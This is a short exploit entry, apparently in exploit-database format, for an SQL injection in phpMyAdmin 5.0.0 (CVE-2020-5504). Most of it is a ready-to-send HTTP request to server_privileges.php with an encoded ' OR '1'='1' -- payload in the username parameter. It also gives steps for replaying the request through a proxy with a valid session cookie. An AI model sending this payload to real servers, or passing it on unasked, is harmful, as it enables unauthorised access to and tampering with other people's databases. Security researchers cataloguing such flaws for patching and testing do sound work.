# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0 
# Tested on: Windows
# CVE : CVE-2020-5504


Proof Of Concept
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.


Steps to Reproduce
Log in phpmyadmin.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
Observe the result.